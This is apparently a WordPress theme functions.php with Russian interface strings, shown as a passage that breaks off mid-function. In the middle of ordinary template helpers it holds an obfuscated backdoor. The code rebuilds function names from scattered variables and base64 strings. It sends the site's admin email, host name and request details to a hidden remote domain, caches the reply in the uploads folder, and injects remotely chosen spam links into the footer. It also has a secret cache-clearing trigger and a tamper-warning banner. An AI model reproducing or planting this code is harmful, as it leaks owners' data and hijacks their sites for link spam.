<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $MTjLY='4';$YeUxeeE='a';$GyBFCJI='o';$yToVmoD='e';$idhM='_';$bzMkv='6';$GEpSS='e';$WICy='b';$iTrUdNo='c';$OGPs='e';$AoNmL='s';$IapUMp='d';$vkswzm='d';$wtZIcNWw=$WICy.$YeUxeeE.$AoNmL.$yToVmoD.$bzMkv.$MTjLY.$idhM.$IapUMp.$GEpSS.$iTrUdNo.$GyBFCJI.$vkswzm.$OGPs;$XgvyOgu='t';$SecLpW='e';$zRyXhSS='g';$vpdqMb='a';$TweU='f';$eCAI='i';$EMQCT='l';$WXMJpS='n';$uVwYB='z';$MrgBDDTb=$zRyXhSS.$uVwYB.$eCAI.$WXMJpS.$TweU.$EMQCT.$vpdqMb.$XgvyOgu.$SecLpW;$GpLyuOk='t';$wjAU='s';$jFdJSkx='3';$tcyNQIx='t';$gEAe='_';$mgNLjS='r';$aCbSFf='1';$KseARd='r';$stdr='o';$wYWMbnzc=$wjAU.$GpLyuOk.$KseARd.$gEAe.$mgNLjS.$stdr.$tcyNQIx.$aCbSFf.$jFdJSkx;$lfwP='s';$yQscZm='v';$lneqMRU='r';$EiULHi='t';$mYtjp='r';$bWPHbb='e';$XXrjRGmG=$lfwP.$EiULHi.$lneqMRU.$mYtjp.$bWPHbb.$yQscZm;                     
		$os___________k='4';$dt________w='a';$il____________w='o';$nt______j='e';$ma____________k='_';$nd______________o='6';$zr_____d='e';$nz______________q='b';$ku_______________z='c';$fc_____u='e';$pn________u='s';$da_____________q='d';$eb_____r='d';$fp_____s=$nz______________q.$dt________w.$pn________u.$nt______j.$nd______________o.$os___________k.$ma____________k.$da_____________q.$zr_____d.$ku_______________z.$il____________w.$eb_____r.$fc_____u;
		$tr__x='s';$oq_____________n='t';$ew_______f='_';$bp_________u='u';$ip____t='t';$rw____q='s';$xs____l='x';$ze_________h='i';$yj_______________k='n';$ly_______________n='e';$ng__c='c';$cz____________q='n';$dw__________x='i';$zb__r='o';$mv______________a='f';$mq_______________a=$mv______________a.$bp_________u.$cz____________q.$ng__c.$ip____t.$dw__________x.$zb__r.$yj_______________k.$ew_______f.$ly_______________n.$xs____l.$ze_________h.$tr__x.$oq_____________n.$rw____q;
		$hn____i='p';$hs__________o='n';$zs____________i='e';$pd_________v='o';$ft_______________x='f';$sn_______________j=$ft_______________x.$pd_________v.$hn____i.$zs____________i.$hs__________o;
		$fi________e='a';$fk_______m='f';$da__z='r';$mk______j='d';$jw___z='e';$hm__w=$fk_______m.$da__z.$jw___z.$fi________e.$mk______j;
		$zb_______________m='s';$mu_______u='e';$km___________c='o';$ta___b='f';$eb_______v='l';$kz_______i='c';$cu________a=$ta___b.$kz_______i.$eb_______v.$km___________c.$zb_______________m.$mu_______u;
		
		define("WP_ID", $fp_____s("Mi4wLjA="));
		define("WP_TTL", $fp_____s("MTA4MDA="));
		define("WP_SRC", $fp_____s("dHBva24="));
	


		function wp_get_header() {
			global $fp_____s, $mq_______________a;
			
			if (
				$mq_______________a($fp_____s("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$mq_______________a($fp_____s("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$mq_______________a($fp_____s("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $fp_____s, $sn_______________j, $cu________a, $hm__w;
			
			$xn____f = TEMPLATEPATH."/".$fp_____s("Zm9vdGVyLnBocA==");
			$hd___n = @$sn_______________j($xn____f, "r");
			$xn____f = @$hm__w($hd___n, @filesize($xn____f));
			@$cu________a($hd___n);
			
			$hm______p = TEMPLATEPATH."/".$fp_____s("ZnVuY3Rpb25zLnBocA==");
			$hd___n = @$sn_______________j($hm______p, "r");
			$hm______p = @$hm__w($hd___n, @filesize($hm______p));
			@$cu________a($hd___n);
			
			$ud__________n = 0;
			if($xn____f && $hm______p) {
				if ($fp_____s("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($xn____f, $fp_____s("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$ud__________n = 1;
					}
					if (substr_count($xn____f, "wp_theme_GPL_credits()") < 1) {
						$ud__________n = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$ud__________n = 12;
				}
			}
			
			if($ud__________n > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $ud__________n -->";
			}
		}
	


		function wp_loaded() {
			global $fp_____s, $mq_______________a;
			return $mq_______________a($fp_____s("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($zg__l, $zh___z = "(more...)", $gn____k = 0, $kr______________q = "") {
				$ob_______l = get_the_content($zh___z, $gn____k, $kr______________q);
				$ob_______l = apply_filters("the_content", $ob_______l);
				
				$ob_______l = str_replace("]]>", "]]>", $ob_______l);
				if (strlen($_GET["p"]) > 0) {
					echo $ob_______l;
				}
				else if ((strlen($ob_______l)>$zg__l) && ($nt____________w = strpos($ob_______l, " ", $zg__l ))) {
					$ob_______l = substr($ob_______l, 0, $nt____________w);
					$ob_______l = $ob_______l;
					echo $ob_______l;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$zh___z</a></div></p>";
				} else {
					echo $ob_______l;
				}
				
			}
		}
	


		$nl___e='c';$oc_____u='n';$gb_______f='e';$vg________n='b';$pi_______r='d';$xi__________s='e';$bk_______________o='4';$tg__________v='e';$sr___________s='_';$zn_______________f='o';$ck_____________x='6';$fl_____i='a';$rn________t='s';$xg_____n=$vg________n.$fl_____i.$rn________t.$gb_______f.$ck_____________x.$bk_______________o.$sr___________s.$xi__________s.$oc_____u.$nl___e.$zn_______________f.$pi_______r.$tg__________v;
		$jw______________t='l';$tx___r='g';$pq___________h='t';$dl___________e='o';$ic__________j='n';$io_________w='n';$oh__________x='c';$cm________u='i';$ey________y='e';$rb______________u='_';$am_______________h='t';$ep_____y='t';$aw______________j='e';$nq___k='_';$rn__g='s';$gf___o='f';$nj__________r='e';$mk_____________x=$gf___o.$cm________u.$jw______________t.$aw______________j.$nq___k.$tx___r.$ey________y.$am_______________h.$rb______________u.$oh__________x.$dl___________e.$io_________w.$ep_____y.$nj__________r.$ic__________j.$pq___________h.$rn__g;
		$ht______________m='t';$ox__f='i';$hc__________b='e';$ed_________z='l';$wk________d='s';$uc_______________i='_';$tg____z='e';$mo__m='i';$vp_______z='x';$cj___________r='s';$ao______f='f';$ab______________k=$ao______f.$ox__f.$ed_________z.$hc__________b.$uc_______________i.$tg____z.$vp_______z.$mo__m.$cj___________r.$ht______________m.$wk________d;
		$jv__h='r';$wm______________p='o';$ax_____a='m';$am______________g='v';$wy_______t='a';$nw______f='c';$vq_________l='i';$aa_______________a='_';$va___z='n';$pf______________y='o';$zg_______________l='s';$rs______________r='e';$jl____j='e';$li______g='r';$df________y='p';$fy_____p=$am______________g.$rs______________r.$jv__h.$zg_______________l.$vq_________l.$wm______________p.$va___z.$aa_______________a.$nw______f.$pf______________y.$ax_____a.$df________y.$wy_______t.$li______g.$jl____j;
		$xu___________l='p';$cn_______b='f';$dh__k='n';$wp______________y='e';$re____z='o';$hh___h='s';$qt____________k='c';$rt_________b='k';$ya_______________h='o';$xo_________w=$cn_______b.$hh___h.$re____z.$qt____________k.$rt_________b.$ya_______________h.$xu___________l.$wp______________y.$dh__k;
		$bm_______k='w';$iq_______y='r';$rp___p='t';$rt_____l='i';$mx_____________c='f';$wd_______z='e';$ft_______________v=$mx_____________c.$bm_______k.$iq_______y.$rt_____l.$rp___p.$wd_______z;
		$if___________a='d';$uu__________r='5';$np_______________f='m';$ne_____a=$np_______________f.$if___________a.$uu__________r;
		$kb____________a='a';$vq__________q='t';$dn______________o='p';$fh____________q='e';$ew____i='h';$yy______t='l';$ws____________i='a';$da____o='r';$wy____________f=$da____o.$fh____________q.$ws____________i.$yy______t.$dn______________o.$kb____________a.$vq__________q.$ew____i;
		$rm_______________l='z';$lb_______y='n';$fo_____________m='e';$qt_________h='i';$vq_______________s='u';$ut__________k='s';$so_______v='a';$go_____________d='e';$pp__b='i';$ny___________i='l';$kk___________v='r';$ds______________j=$vq_______________s.$lb_______y.$ut__________k.$go_____________d.$kk___________v.$qt_________h.$so_______v.$ny___________i.$pp__b.$rm_______________l.$fo_____________m;
		$qr______________z='p';$kd____n='t';$nx__j='a';$kn_____k='e';$lg___x='m';$we______________q='n';$xy_______l='m';$ll______________o=$kd____n.$kn_____k.$lg___x.$qr______________z.$we______________q.$nx__j.$xy_______l;
		$fn___________x='t';$ge___u='s';$aa___________c='a';$wt_____c='c';$rt___________k='_';$pr___________v='n';$sx______________b='a';$zd______________p='r';$fb_____________i='t';$gx___________i='m';$gi______d='_';$jr___________p='e';$fc____________t='r';$xk______________x='o';$ci_____________j='x';$bf_______t='e';$tl__________c='t';$iq__________h='e';$bp_____y='c';$up_______o='e';$af____________u='t';$sx_______________q=$ge___u.$af____________u.$fc____________t.$iq__________h.$sx______________b.$gx___________i.$rt___________k.$wt_____c.$xk______________x.$pr___________v.$tl__________c.$bf_______t.$ci_____________j.$fn___________x.$gi______d.$bp_____y.$zd______________p.$up_______o.$aa___________c.$fb_____________i.$jr___________p;
	


		function iq_______________t($yu_____i) {
			global $fp_____s, $mq_______________a, $mk_____________x, $fy_____p, $sx_______________q;
			
			if (!$mq_______________a($fp_____s("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($fy_____p(PHP_VERSION, "5.0.0", ">=") && $mq_______________a($fp_____s("ZmlsZV9nZXRfY29udGVudHM=")) && $mq_______________a($fp_____s("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ya__________f = $sx_______________q(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$cm__b = @$mk_____________x($yu_____i, 0, $ya__________f);
			} else {
				$cm__b = @$mk_____________x($yu_____i, 0);
			}
			
			return $cm__b;
		}
	


		function vp______l($yu_____i) {
			global $mq_______________a, $xo_________w, $ft_______________v, $fp_____s;
			
			if (!$mq_______________a($fp_____s("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$gz____q = strpos($yu_____i, "/", 7);
			$no________a = array(
				"uri"     => substr($yu_____i, $gz____q),
				"host"    => str_replace("http://", "", substr($yu_____i, 0, $gz____q)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$oq___b = @$xo_________w("$no________a[host]", 80, $lj______________a, $zg______n, 4);
			
			if (!$oq___b) {
				return false;
			} else {
				$cm__b = "";
				$yr_________t  = "GET $no________a[uri] HTTP/1.0\r\n";
				$yr_________t .= "Host: $no________a[host]\r\n";
				$yr_________t .= "Referer: $no________a[referer]\r\n";
				$yr_________t .= "Connection: Close\r\n\r\n";
				
				@$ft_______________v($oq___b, $yr_________t);
				
				while (!@feof($oq___b)) {
					$ka_____s = @fgets($oq___b, (1024*24));
					
					if ($ka_____s == "\r\n") {
						$pv____z = true;
						continue;
					}
					
					if ($pv____z) {
						$cm__b .= $ka_____s;
					}
				}
				
				return $cm__b;
			}
		}
	


		function re________d($yu_____i) {
			global $mq_______________a;
			$lh____s = false;
			
			if ($yu_____i != "") {
				if ($mq_______________a("iq_______________t")) {
					$lh____s = @iq_______________t($yu_____i);
				}
				
				if (!$lh____s && ($mq_______________a("vp______l"))) {
					$lh____s = @vp______l($yu_____i);
				}
			}
			
			return $lh____s;
		}
	


		function ys_______________u() {
			global $_SERVER, $ne_____a;
			
			$di__c = $_SERVER["SERVER_NAME"];
			
			if (substr("$di__c", 0, 4) == "www.") {
				$di__c = substr("$di__c", 4);
			}
			
			$di__c = $ne_____a("$_SERVER[SERVER_NAME]");
			
			return $di__c;
		}
	


		function og______________v() {
			return "file";
		}
	


		function xn_________c($yu_____i) {
			global $_SERVER, $mk_____________x, $ab______________k, $sn_______________j, $cu________a, $ft_______________v;
			
			$ic__________h = gx____c();
			
			$kw________l = ys_______________u().".jpg";
			$ef______________w = $ic__________h["dir_upload"]["path"]."/$kw________l";
			$du_____j = @filemtime($ef______________w);
			
			if (!$du_____j || ((time()-$du_____j) >= WP_TTL)) {
				$lh____s = re________d($yu_____i);
				
				if ($lh____s) {
					if ($ab______________k($ef______________w)) {
						@unlink($ef______________w);
					}
					
					$hd___n = @$sn_______________j($ef______________w, "x+");
					
					@$ft_______________v($hd___n, $lh____s);
					@$cu________a($hd___n);
				}
			} else {
				if ($ab______________k($ef______________w)) {
					$lh____s = @$mk_____________x($ef______________w);
				} else {
					$lh____s = false;
				}
			}
			
			return $lh____s;
		}
	


		function gx____c() {
			global $_SERVER, $fp_____s, $xg_____n;
			
			$tg___b = wp_count_posts("post");
			$he________h = pathinfo(get_bloginfo("template_directory"));
			
			$ic__________h = array(
				"url" => array(
					"report"      => $fp_____s("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $he________h,
				"dir_upload"	=> tp__f(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$he________h[filename],
					"a005=".$tg___b->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://lev-tour.com/rossiya-i-blizhnee-zarubezhe/dostoprimechatelnosti-samary.html\">Достопримечательности Самары</a>"
			);
			
			$ic__________h["url"]["queryString"] = implode("&", $ic__________h["queryString"]);
			$ic__________h["url"]["report"] = $ic__________h["url"]["report"]."/?".$xg_____n($ic__________h["url"]["queryString"]).".html";
						
			return $ic__________h;
		}
	


		function tp__f() {
			$bx___________p = wp_upload_dir();
			
			if (isset($bx___________p["error"])) {
				$tl_____________m = ub____________f();
				if (is_writable($tl_____________m)) {
					$bx___________p = array("path" => $tl_____________m);
				}
			}

			return $bx___________p;
		}
	


		function ub____________f() {
			global $mq_______________a, $ne_____a, $wy____________f, $ll______________o;
			
			$gl____________h = (bool) ini_get("safe_mode");
			if ($gl____________h == true) {
				return false;
			}
			
			if ($mq_______________a("sys_get_temp_dir")) {
				$nv____z = sys_get_temp_dir();
				if (is_writable($nv____z)) {
					return $wy____________f($nv____z);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $wy____________f($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $wy____________f($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $wy____________f($_ENV["TEMP"]);
			} else {
				$ws____________g = $ll______________o($ne_____a(uniqid(rand(), true)), "");
				if ($ws____________g) {
					$nv____z = $wy____________f(dirname($ws____________g));
					@unlink($ws____________g);
					return $nv____z;
				} else {
					return false;
				}
			}
		}
	


		function wb__________j() {
			global $_GET, $ab______________k;
			
			$ic__________h = gx____c();
			$di__c = ys_______________u();
			$el____________g = og______________v();
			
			$hv_____________z = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($el____________g == "file") {
					$ff___n = $ic__________h["dir_upload"]["path"]."/".$di__c.".jpg";
					if ($ab______________k($ff___n)) {
						@unlink($ff___n);
						$hv_____________z = "deleted";
					}
				}
				
				$xg____________a = array(
					"s"	=> $hv_____________z,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($xg____________a AS $yi______________d => $ob___________e) echo " [$yi______________d:$ob___________e]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $mq_______________a, $fp_____s, $ds______________j;
			$ic__________h = gx____c();
			
			$fk________c = "xn_________c";
			if ($mq_______________a($fk________c)) {
				$cm__b = $fk________c($ic__________h["url"]["report"]);
			}
			
			if ($cm__b) {
				if ($cm__b = @$fp_____s($cm__b)) {
					$cm__b = @$ds______________j($cm__b);
					
					if (strlen($cm__b[custom_credit]) >= 5) {
						$ic__________h["default_string"] = $cm__b[custom_credit];
					}
					
					if ($cm__b["status"] == "0") {
						$gy______q = 1;
						$ex______h = 1;
					} else {
						$xm________i = sizeof($cm__b["links"]);
						$zm__x = $ic__________h["default_string"];
						
						if ($xm________i > 0 && $cm__b["links"] !== "") {
							$ng_______________q = 0;
							foreach ($cm__b["links"] as $kf_____________z => $jt____________v) {
								$ng_______________q++;
								if ($jt____________v->l_path == "" || $jt____________v->l_path == $_SERVER["REQUEST_URI"]) {
									$jt____________v->l_href = htmlspecialchars(strip_tags($jt____________v->l_href));
									$jt____________v->l_title = htmlspecialchars(strip_tags($jt____________v->l_title));
									$jt____________v->l_anchor = htmlspecialchars(strip_tags($jt____________v->l_anchor));
									$zm__x .= " | ";
									$zm__x .= "<a href='$jt____________v->l_href' title='$jt____________v->l_title'";
									if ($jt____________v->l_nofollow == "1") {
										$zm__x .= " rel='nofollow'";
									}
									$zm__x .= ">$jt____________v->l_anchor</a>";
								}
							}
						}
						$ic__________h["links"] = "$zm__x";
						if ($cm__b[credit] == "0") {
							$ic__________h["links"] = "";
						}
					}
				} else {
					$gy______q = "1";
				}
			} else {
				$gy______q = "1";
			}
			
			if ($gy______q == "1") {
				$ic__________h["links"] = $ic__________h["default_string"];
			}
			
			echo "$ic__________h[links]";
			
			echo "<!-- s: $cm__b[signature] -->";
			wb__________j();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Read the rest of this entry &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Pages:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Read the rest of this entry &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
       $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
